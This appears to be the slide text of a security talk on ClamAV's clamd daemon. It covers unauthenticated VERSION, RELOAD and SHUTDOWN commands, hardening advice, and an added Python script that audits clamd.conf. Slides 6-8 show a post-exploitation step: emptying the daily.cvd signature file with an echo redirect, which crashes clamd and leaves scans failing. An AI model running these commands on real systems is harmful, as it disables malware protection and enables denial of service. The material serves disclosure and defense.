Baking even more Clam(AV)s for Fun & Profit.
1. Baking even more Clam(AV)s for Fun & Profit.
ClamAV in a network-accessible configuration provides not only remote virus scanning, but also the potential for DOS, etc.
2. ClamAV - what it is.
Open Source Software
Provides Virus Scanning
Currently owned by Sourcefire Cisco Systems
3. ClamAV - Component Overview
What it does:
clamscan - cmd line scanner, stand alone
freshclam - signature DB update tool
clamd - scanning server
Scanning clients:
clamdscan - cmd line scanner
clamav-milter - email scanning plugin
4. The Design Problems
In Theory
Configuration
Clamd can bind to an IP address
No Access Controls
No Authentication
No connection logging
Malformed DB Handling
5. The Implementation Problems
In Practice
Availability of Administrative Commands.
VERSION
Recon & Information disclosure
RELOAD
Default Virus DB size is about 74 MB
Continuous reloads result in High CPU utilization.
SHUTDOWN
Guess what that does? :-)
A DOS of a networked ClamAV installation.
Discussed on ClamAV-user mailing list
July 22-23, 2011
6. Bug 2727
Use in Post Exploitation
clamconf|grep "DatabaseDirectory"
DatabaseDirectory = "/usr/local/share/clamav"
DatabaseDirectory = "/usr/local/share/clamav"
cd /usr/local/share/clamav
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
echo -n "" > daily.cvd
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
7. Bug 2727
Use in Post Exploitation - Cont'd
Nov 4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamav
Nov 4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD file
Nov 4 18:43:50 host clamd[24481]: Terminating because of a fatal error.
Nov 4 18:43:50 host clamd[24481]: Waiting for all threads to finish
Nov 4 18:43:50 host clamd[24481]: Shutting down the main sockets.
Nov 4 18:43:50 host clamd[24481]: Pid file removed.
Nov 4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013
Nov 4 18:43:50 host clamd[24481]: Closing the main sockets.
Nov 4 18:43:50 host clamd[24481]: Socket file removed.
8. Operational Impact
clamdscan -m /
ERROR: Can't connect to clamd: No such file or directory
----------- SCAN SUMMARY -----------
Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)
9. The Defense
Configuration
Bind to a LOCAL Socket
Bind to loopback interface
Access Controls - FIREWALL
FIX THE BUGS! - Just Saying... :-)
Monitoring
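A small audit of clamd.conf for the exposure the defense slide talks about: TCP listener with no address or a non-loopback address versus a loopback or LocalSocket-only setup. This is an added example, not code from the talk or from ClamAV; TCPSocket, TCPAddr and LocalSocket are real clamd.conf directives, but the checking logic and the two sample configurations are constructed here.

```python
"""Audit a clamd.conf for network exposure of the unauthenticated
VERSION/RELOAD/SHUTDOWN commands (added example; sample configs are constructed)."""
import ipaddress

# Constructed weak configuration: clamd bound to every interface.
WEAK_CONF = """# clamd.conf (constructed example)
LogFile /var/log/clamav/clamd.log
TCPSocket 3310
TCPAddr 0.0.0.0
"""

# Constructed hardened configuration: local UNIX socket only, no TCP listener.
HARDENED_CONF = """# clamd.conf (constructed example)
LogFile /var/log/clamav/clamd.log
LocalSocket /var/run/clamav/clamd.ctl
"""

def parse_clamd_conf(text):
    """Return {directive_lowercase: [values]}; skips blank and '#' comment lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(parts[0].lower(), []).append(value)
    return conf

def is_loopback(addr):
    """True for 127.0.0.0/8, ::1 or the literal name 'localhost'."""
    if addr.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False

def audit_clamd_conf(text):
    """Return findings as strings; an empty list means no TCP exposure beyond loopback."""
    conf = parse_clamd_conf(text)
    findings = []
    if "tcpsocket" in conf:
        addrs = conf.get("tcpaddr", [])
        if not addrs:
            findings.append("TCPSocket set without TCPAddr: clamd listens on all interfaces")
        for addr in addrs:
            if not is_loopback(addr):
                findings.append(f"TCPAddr {addr} is not loopback: admin commands reachable without authentication")
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_clamd_conf(conf) or ["ok"])
```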
11. Tools - Continued bragging
CCEE
CCEE 0.97.4
Initially a patch for bug 1754
Adds connection logging to clamd for
administrative commands
Adds other functionality to ClamAV
Woefully Outdated
I am NOT a real c coder.
I DO have other things to do. :-)
12. Tools - Continued
Is he done yet? -- Almost. :-)
clamd.monitor
Monitor plugin for the mon framework
Can be used as a stand alone solution
Get them all and more at
http://www.cmpublishers.com/oss